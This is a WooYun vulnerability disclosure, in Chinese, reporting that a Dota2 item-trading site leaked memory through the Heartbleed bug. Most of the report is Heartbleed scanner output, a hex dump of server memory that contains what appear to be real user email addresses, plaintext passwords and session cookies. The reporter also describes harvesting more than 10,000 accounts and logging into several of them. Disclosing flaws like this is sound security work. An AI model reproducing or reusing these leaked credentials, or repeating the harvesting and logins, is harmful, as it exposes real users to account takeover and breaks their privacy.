乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-27: 细节已通知厂商并且等待厂商处理中 2016-01-27: 厂商已经确认,细节仅向厂商公开 2016-02-06: 细节向核心白帽子及相关领域专家公开 2016-02-16: 细节向普通白帽子公开 2016-02-26: 细节向实习白帽子公开 2016-03-10: 细节向公众公开
Dota2饰品交易集市运维不当泄露用户名和密码和cookies(采集了10K+帐号密码) 测试后已经删除
RT Dota2饰品交易集市主站 http://www.dota2sp.com/ 存在HeartBleed 明文泄露用户名 密码 cookies。。。可能引以进一步的危害 (如用户名密码做字典 测试国内主流网站 。。帐号内有现金武器装备等。。。虽然本人已经N年不玩游戏啦。。所以看不懂 - -心脏出血漏洞(英语:Heartbleed bug),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的程序错误,首次于2014年4月披露。该程序库广泛用于实现互联网的传输层安全(TLS)协议。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查)[3],因此漏洞的名称来源于“心跳”(heartbeat)[4]。该程序错误属于缓冲区过读[5],即可以读取的数据比应该允许读取的还多[6]ZZ wiki
如图。。。先上测试图吧。。。
Scanning www.dota2sp.com on port 443Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 4757 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Server TLS version was 1.2Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 6F 6E 6E 65 ....#.......onne 00e0: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 ction: Keep-Aliv 00f0: 65 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 64 6F 74 e..Host: www.dot 0100: 61 32 73 70 2E 63 6F 6D 0D 0A 55 73 65 72 2D 41 a2sp.com..User-A 0110: 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 gent:Mozilla/5.0 0120: 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 (compatible; MS 0130: 49 45 20 39 2E 30 3B 20 57 69 6E 64 6F 77 73 20 IE 9.0; Windows 0140: 4E 54 20 36 2E 31 3B 20 54 72 69 64 65 6E 74 2F NT 6.1; Trident/ 0150: 35 2E 30 29 3B 20 33 36 30 53 70 69 64 65 72 0D 5.0); 360Spider. 0160: 0A 0D 0A 5B 1C FB 9F 6A 25 1A A5 F9 85 24 B5 FE ...[...j%....$.. 0170: 01 A1 4F 78 16 DD 63 32 5B 8F 60 00 F1 6B EE FC ..Ox..c2[.`..k.. 0180: C4 53 68 99 85 D6 00 BA 51 3E EB 61 A7 C3 D6 D8 .Sh.....Q>.a.... 0190: 58 FB 3C 8B 9F 77 77 77 2D 66 6F 72 6D 2D 75 72 X.<..www-form-ur 01a0: 6C 65 6E 63 6F 64 65 64 0D 0A 52 65 66 65 72 65 lencoded..Refere 01b0: 72 3A 20 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 r: https://www.d 01c0: 6F 74 61 32 73 70 2E 63 6F 6D 2F 73 73 6C 2F 6C ota2sp.com/ssl/l 01d0: 6F 67 69 6E 0D 0A 41 63 63 65 70 74 2D 45 6E 63 ogin..Accept-Enc 01e0: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 oding: gzip, def 01f0: 6C 61 74 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E late..Accept-Lan 0200: 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B guage: zh-CN,zh; 0210: 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 48 q=0.8..Cookie: H 0220: 6D 5F 6C 76 74 5F 33 38 66 62 39 37 39 31 37 30 m_lvt_38fb979170 0230: 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 39 587afeb07c5e0e59 0240: 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 36 36 e86465=145385966 0250: 35 3B 20 48 6D 5F 6C 70 76 74 5F 33 38 66 62 39 5; Hm_lpvt_38fb9 0260: 37 39 31 37 30 35 38 37 61 66 65 62 30 37 63 35 79170587afeb07c5 0270: 65 30 65 35 39 65 38 36 34 36 35 3D 31 34 35 33 e0e59e86465=1453 0280: 38 35 39 36 36 37 0D 0A 0D 0A 72 75 72 6C 3D 25 859667....rurl=% 0290: 32 46 73 73 6C 25 32 46 6C 6F 67 69 6E 26 55 73 2Fssl%2Flogin&Us 02a0: 65 72 4E 61 6D 65 3D 35 38 32 34 34 33 34 39 34 erName=582443494 02b0: 25 34 30 71 71 2E 63 6F 6D 26 50 61 73 73 77 6F %40qq.com&Passwo 02c0: 72 64 3D 6E 69 61 6E 31 31 30 33 32 34 70 E6 2B rd=nian110324p.+ 02d0: 7E 62 F4 1B 86 27 D3 10 02 0F 98 3A B7 34 37 32 ~b...'.....:.472 02e0: 30 36 35 38 32 25 34 30 71 71 2E 63 6F 6D 26 50 06582%40qq.com&P 02f0: 61 73 73 77 6F 72 64 3D 67 78 73 72 7A 31 32 33 assword=gxsrz123 0300: 34 35 70 93 F4 AA EE 85 82 52 70 C2 82 BB 1B 92 45p......Rp..... 0310: 0A 0F 64 3D 79 6C 6D 69 68 61 6E 67 69 36 21 9F ..d=ylmihangi6!. 0320: 67 EB 73 AD E7 29 D7 10 0F AC FD 96 C4 AD 4C EB g.s..)........L. 0330: 9D FC 79 16 6B 69 E8 99 66 22 B1 9C 5A B9 C2 A2 ..y.ki..f"..Z... 0340: 58 C7 82 91 B7 C9 F7 2C 31 34 35 33 38 35 37 35 X......,14538575 0350: 37 32 2C 31 34 35 33 38 35 39 32 37 34 3B 20 48 72,1453859274; H 0360: 6D 5F 6C 70 76 74 5F 33 38 66 62 39 37 39 31 37 m_lpvt_38fb97917 0370: 30 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 0587afeb07c5e0e5 0380: 39 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 32 9e86465=14538592 0390: 39 31 0D 0A 0D 0A 72 75 72 6C 3D 25 32 46 6D 79 91....rurl=%2Fmy 03a0: 74 72 61 64 65 73 26 55 73 65 72 4E 61 6D 65 3D trades&UserName= 03b0: 38 33 34 39 37 36 39 37 33 40 71 71 2E 63 6F 6D [email protected] 03c0: 26 50 61 73 73 77 6F 72 64 3D 61 31 33 30 30 33 &Password=a13003 03d0: 33 32 32 35 35 35 DB 07 E4 B3 BE 67 F0 26 A3 D2 322555.....g.&.. 03e0: 15 3B 0F D7 07 ED 9E 47 7A 02 05 05 05 05 05 05 .;.....Gz....... 03f0: 57 21 DD 4C B2 5C 9B 32 84 15 AE A5 DB 68 F3 CD W!.L.\.2.....h.. 0400: C3 D1 F7 83 CB FA 9B 21 F4 B7 21 9C C7 37 8A 68 .......!..!..7.h 0410: 6E B8 DA 4C 67 DA A3 14 F8 94 F3 E7 E3 DA 18 F6 n..Lg........... 0420: 71 5F AB 72 DF 57 E9 29 3D BD 76 16 AA 19 D4 81 q_.r.W.)=.v..... 0430: 02 E7 0B 47 B6 1E A5 79 79 C6 D7 98 E7 8C 42 7E ...G...yy.....B~ 0440: D8 48 0C 26 CF D1 D8 DE 5C 9B A0 4E C5 6C D7 36 .H.&....\..N.l.6 0450: C4 16 B5 E3 29 55 FA C3 E7 62 B5 31 48 74 5C 21 ....)U...b.1Ht\! 0460: A4 E4 5F A5 3E C1 0A 3A F7 15 CA C9 82 B5 1F C1 .._.>..:........ 0470: 96 96 5F 4D 85 87 64 00 C1 CC 88 54 9D 20 75 31 .._M..d....T. u1 0480: 69 93 C7 2E 62 8E 35 73 83 D8 52 9A AF CA DD 16 i...b.5s..R..... 0490: EC F8 DE 37 FA 21 3D BE EE CB D7 BF A1 3D 03 1D ...7.!=......=.. 04a0: 19 21 DB AB 8B BD F2 87 5A 95 AB 67 BC C6 60 BD .!......Z..g..`. 04b0: 68 1B AF 03 15 5A 54 46 41 AB 72 7B 3C 81 95 28 h....ZTFA.r{<..( 04c0: 8F D2 E3 C8 20 BE D3 0D DC 14 4E 5C C0 92 0D 27 .... .....N\...' 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。WARNING: server www.dota2sp.com returned more data than it should - server is vulnerable!
测试采集了10K账户密码(vim 已经去处重复行 这里复习一下
不过要先sort(已经删除采集的账户密码)
随便登录几个看看
fix issue....有礼物吗...修复后。。通知用户改密码
危害等级:高
漏洞Rank:10
确认时间:2016-01-27 21:05
请联系客服QQ: 谢谢
暂无